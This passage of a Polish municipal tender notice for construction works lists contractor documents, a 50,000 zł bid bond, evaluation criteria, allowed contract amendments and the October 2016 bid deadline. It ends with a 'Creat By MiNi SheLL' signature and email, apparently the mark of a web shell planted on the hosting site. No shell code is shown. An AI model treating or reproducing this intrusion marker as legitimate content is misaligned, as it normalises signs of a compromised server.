Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt. 1 i 2, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby.
Dokumenty/oświadczenia powinny być wystawione nie wcześniej niż 3 miesiące przed upływem
składania ofert.

3.  Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności
gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu
potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy;
Dokumenty powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu
składania ofert.


Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu jak wyżej, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.

Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentu, o których mowa w pkt. 1.8.7., zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby

Dokumenty/oświadczenia powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem
składania ofert.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1 Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do
złożenia w wyznaczonym nie krótszym  niż 5 dni terminie aktualnych na dzień  złożenia
 następujących oświadczeń  lub dokumentów:     

2 Wykaz osób, skierowanych przez Wykonawcę do realizacji  zamówienia publicznego, w szczególności  odpowiedzialnych  za świadczenie usług, kontrolę jakości  lub kierowanie  robotami budowlanymi, wraz z informacjami  na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami  na formularzu zgodnym z treścią załącznika Nr 4 do niniejszej specyfikacji. 

3	Wykaz robót budowlanych wykonanych w okresie ostatnich pięciu  lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie wraz  z podaniem ich rodzaju i wartości, daty i miejsca  wykonania, i podmiotów na rzecz których  roboty te zostały wykonane  zgodnie z treścią załącznika nr 5  Wykaz robót, do  niniejszej SIWZ. 

4.Dowody określające czy roboty budowlane wskazane w wykazie  zostały wykonane
należycie w szczególności z podaniem  informacji czy roboty zostały wykonane zgodnie z przepisami prawa  budowlanego  i prawidłowo ukończone, przy czym dowodami, o których mowa są referencje bądź inne dokumenty  wystawione przez podmiot, na rzecz którego roboty budowlane  były wykonywane a jeżeli z uzasadnionej przyczyny  o obiektywnym charakterze  wykonawca nie jest w stanie  uzyskać tych dokumentów  inne dokumenty.   

5 Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej  wysokość posiadanych środków  finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż  1 miesiąc przed upływem terminu składania ofert.

Jeżeli z uzasadnionej przyczyny  wykonawca nie może złożyć dokumentów  dotyczących sytuacji  finansowej lub ekonomicznej   o których mowa w pkt 5 niniejszej specyfikacji  może złożyć  inny dokument, który w wystarczający sposób potwierdza  spełnienie  warunku opisanego w Rozdz .VII ust. 1, pkt 1.2 niniejszej specyfikacji  
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.Formularz OFERTA  załącznik nr 1 do SIWZ.

2.Pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika 
z innych dokumentów dołączonych do oferty złożone w oryginale lub kopii poświadczonej
notarialnie

 
 
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 50.000,00  zł
  /słownie: pięćdziesiąt tysięcy /

2.Wadium wnosi się przed upływem terminu składania ofert.

3.Wadium może być wniesione w jednej lub kilku następujących formach, w zależności od
wyboru Wykonawcy:
-  pieniądzu;
-  poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-	
  kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
- gwarancjach bankowych;
-  gwarancjach ubezpieczeniowych
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia
9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109,
poz. 1158  z późn. zm.

4.W przypadku wnoszenia wadium w formie pieniądza, wpłaty należy dokonać przelewem na
rachunek bankowy Zamawiającego, tj.: Urząd Gminy Wielka Wieś, 32-085 Szyce,:
Krakowski Bank Spółdzielczy w Krakowie Oddział Wielka Wieś   Nr
57859100070040059187860094

5.Wadium wnoszone w innej formie, należy złożyć w formie oryginału w Wydziale Finansowym
Urzędu  Gminy Wielka Wieś, 32-085 Szyce, Pl. Wspólnoty 1, pok. 107, I piętro najpóźniej do dnia
10.10.2016r. do godz. 9:30

6.Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.

7.Oferta Wykonawcy który nie wniesie wadium na zasadach określonych w SIWZ, zostanie odrzucona.

8.Zamawiający zwróci  wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania z wyjątkiem Wykonawcy którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem Rozdz. X pkt 12 SIWZ  	

9.Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert

10.Zamawiający będzie żądał ponownego wniesienia wadium przez Wykonawcę któremu zwrócono wadium  na podstawie Rozdz. X pkt 8 SIWZ jeżeli w wyniku  rozstrzygnięcia odwołania  jego oferta została wybrana jako najkorzystniejsza. Wykonawca będzie zobowiązany wnieść wadium w terminie określonym  przez Zamawiającego .

11.Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek  bankowy wskazany przez Wykonawcę.

12.Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie o którym mowa w art. 26 ust. 3  i 3a ustawy, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności o których mowa w art. 24 ust.1 oświadczenia o którym mowa w art. 25a ust.1,pełnomocnictw lub nie wyraził zgody na  poprawienie omyłki o której mowa w art. 87 ust.2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.

13.Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) nie wniesie wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe  z przyczyn leżących po stronie Wykonawcy.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>termin gwarancji</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zmiana terminu  Inwestor  dopuszcza możliwość zmiany terminów o których mowa w pkt 5.1 i 5.2 projektu umowy tylko w przypadku wystąpienia okoliczności nie wynikłych z winy Wykonawcy w tym m.in.:
a) wystąpienia warunków atmosferycznych uniemożliwiających realizację robót 
b) wystąpienia zmian parametrów projektowych opisanych w SIWZ dla wykonywanego obiektu, zmiany technologii  wykonania, zastosowania rozwiązań zastępczych, zamiennych lub równoważnych  które nie mogły być przewidziane przez Zamawiającego mimo dołożenia należytej staranności 
c) wystąpienia konieczności wykonania robót nie przewidzianych  np. wystąpienie trudnych warunków  terenowych w szczególności niezinwentaryzowanych podziemnych sieci, instalacji, urządzeń itp.
d) przedłużania się prac związanych z prowadzeniem badań archeologicznych
e) wystąpienia niezależnych od Zamawiającego i Wykonawcy trudności w uzyskaniu pozwoleń,
decyzji, uzgodnień niezbędnych do realizacji umowy.  
f) w przypadku  przestojów lub opóźnień  w realizacji umowy wywołanych : prowadzonymi równolegle  pracami budowlanymi  lub montażowymi  przez inne podmioty. 
g) w przypadku dopuszczonego prawem zlecenia robót dodatkowych, jeżeli terminy ich wykonania rodzaj lub zakres uniemożliwiają  dotrzymanie pierwotnego terminu  zakończenia realizacji przedmiotu umowy 
h). w przypadku  uzgodnienia miedzy Stronami skrócenia terminu realizacji przedmiotu umowy 
i)  w przypadku wystąpienia siły wyższej zdefiniowanej  w art. 1 umowy 
Termin wykonania zamówienia zostanie zmieniony odpowiednio o czas:
a) wstrzymania robót ze względu na warunki atmosferyczne
b) niezbędny do wprowadzenia zmian do projektu lub o czas konieczny dla wykonania przedmiotu umowy  po wprowadzonych zmianach 
c)  niezbędny do wykonania robót nie przewidzianych.
d) wstrzymania robót ze względu na przedłużające się badania archeologiczne
e)  uzyskania niezbędnych do realizacji umowy pozwoleń, decyzji, uzgodnień.
f).  o okres opóźnienia spowodowany  prowadzonymi równolegle  pracami budowlanymi  lub montażowymi  przez inne podmioty. 
g) o okres opóźnienia spowodowany wykonywaniem robót dodatkowych 
h) o czas uzgodniony miedzy Stronami umowy.
i) o okres opóźnienia spowodowany działaniami siły wyższej. 

Zmiana terminu powinna być potwierdzona protokołem konieczności zaakceptowanym przez
Zamawiającego i podpisana przez Zamawiającego i Wykonawcę.
Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania Zamawiającego do wyrażenia takiej zgody.
Zamawiający oprócz zmian opisanych w art. 5 ust. 5.4 umowy przewiduje  możliwość istotnych zmian
Umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy w przypadkach
określonych poniżej:
a) ustawowej  zmiany stawki podatku VAT w sytuacji gdy w trakcie realizacji przedmiotu umowy nastąpi zmiana stawki podatku VAT dla robót objętych przedmiotem umowy. W takim przypadku Zamawiający dopuszcza  możliwość zmiany wysokości wynagrodzenia brutto określonego w art. 12 ust. 1 umowy o kwotę równa różnicy  w kwocie podatku, jednakże wyłącznie  co do części wynagrodzenia  za roboty, których do dnia zmiany stawki podatku VAT  jeszcze nie wykonano.

b).wysokości minimalnego wynagrodzenia za pracę, albo minimalnej stawki godzinowej , ustalonych na
podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę
ustalonego na podstawie na podstawie art. 2 ust. 3. W takim przypadku Zamawiający dopuszcza  możliwość zmiany wysokości wynagrodzenia brutto określonego w art. 12 ust. 1 umowy o kwotę równą różnicy wynagrodzenia, jednakże wyłącznie  co do części wynagrodzenia  za roboty, których do dnia zmiany minimalnego wynagrodzenia jeszcze nie wykonano.


c)zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki
składki na ubezpieczenia społeczne lub zdrowotne. Wykonawca   takim przypadku przedkłada
Zamawiającemu wykaz personelu, który realizuje przedmiot umowy i dla którego ma zastosowanie
zmiana wraz z kalkulacją kosztów wynikającą z przedmiotowej zmiany. Zamawiający dopuszcza  możliwość zmiany wysokości wynagrodzenia brutto określonego w art. 12 ust. 1 umowy jednakże wyłącznie  co do części wynagrodzenia  za roboty, których do dnia zmiany składki  jeszcze nie wykonano.

d) W przypadku obiektywnej konieczności zmiany technologii wykonania przedmiotu Umowy, zastosowania rozwiązań zamiennych, zastępczych lub równoważnych, które nie mogły być przewidziane przez Zamawiającego pomimo dołożenia należytej staranności, Zamawiający dopuszcza zmianę zakresu prac, przy czym wyłącznie w zakresie niezbędnym do zgodnego z obowiązującymi standardami, wymaganiami technicznymi oraz normami, prawidłowego wykonania przedmiotu Umowy lub zmianę wynagrodzenia, określonego w art. 12  Umowy, w zakresie uwzględniającym zmieniony zakres prac.

e).W przypadku zmniejszenia zakresu przedmiotu umowy lub rezygnacji z określonych robót  uznanych jako niekonieczne, choć objętych ofertą Wykonawcy  to nastąpi odliczenie wartości tych robót  z wynagrodzenia należnego Wykonawcy określonego w art. 12  Umowy na podstawie kosztorysu ofertowego.

f). W przypadku robót zamiennych  Zamawiający dopuszcza zmianę wynagrodzenia określonego w art. 12  Umowy. Obliczenie wartości robót podlegających zamianie, o którą zmienione (pomniejszone lub zwiększone) zostanie wynagrodzenie należne Wykonawcy, nastąpi na podstawie kosztorysu różnicowego sporządzonego przez Wykonawcę w oparciu o następujące założenia: średnie stawki robocizny, materiałów i sprzętu ujęte w wydawnictwie Sekocenbud za dany kwartał, a w przypadku braku odpowiednich pozycji w Sekocenbudzie wyliczenie zostanie wykonane w oparciu o średnie stawki i ceny rynkowe dla danych robót, i następnie zaakceptowanego przez Zamawiającego.

g).W przypadku zmiany kierownika budowy/robót (jedynie za uprzednią pisemną zgodą Zamawiającego) na wniosek Wykonawcy w przypadku:
1) choroby lub innych zdarzeń losowych dotyczących kierownika budowy/robót,
2) nie wywiązywania się kierownika budowy/robót z obowiązków wynikających z umowy,
3) jeżeli zmiana kierownika budowy/robot stanie się konieczna z jakichkolwiek przyczyn
niezależnych od Wykonawcy (np. rezygnacji).

h). W przypadku zmiany kierownika budowy/robót na wniosek Zamawiającego w przypadku, gdy nie wykonuje on swoich obowiązków wynikających z Umowy, Wykonawca zobowiązany jest zmienić kierownika budowy/robot zgodnie z żądaniem Zamawiającego we wskazanym przez Zamawiającego terminie.

i). W przypadku zmiany kierownika budowy/robót, o których mowa w podpkt. g) i h) niniejszego
paragrafu Umowy, nowy kierownik budowy/robót musi spełniać wymagania określone w SIWZ dla danego specjalisty.

j). W przypadku zmiany podwykonawców: w przypadku wprowadzenia podwykonawcy, wprowadzenia nowego (kolejnego) podwykonawcy, rezygnacji podwykonawcy, zmiany wartości lub zakresu robót wykonywanych przez podwykonawcę, Zamawiający może wyrazić zgodę na powyższe po zaakceptowaniu umowy Wykonawcy z podwykonawcą wraz z częścią dokumentacji dot. wykonania robót określonych w umowie, w terminie 14 dni od przekazania umowy przez Wykonawcę.

k). w przypadku zmiany sposobu rozliczania umowy lub dokonywania płatności na rzecz
Wykonawcy, np. w przypadku zawarcia przez Zamawiającego umowy o dofinansowanie
projektu.

l)  w przypadku zmiany harmonogramu rzeczowo-finansowego:
1) w przypadku zmiany terminu realizacji przedmiotu zamówienia lub jego części, lub
2) w celu dostosowania go do aktualnego zaawansowania realizacji przedmiotu zamówienia,

13.3.      Zmiana umowy może nastąpić również w przypadku :
         a) zmian regulacji prawnych obowiązujących w dniu podpisania umowy
b) gdy z przyczyn organizacyjnych konieczna będzie zmiana osób upoważnionych do dokonania     
czynności, zmiana danych teleadresowych, określonych w niniejszej umowie.

Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania Zamawiającego do wyrażenia takiej zgody.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 10/10/2016, godzina: 09:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com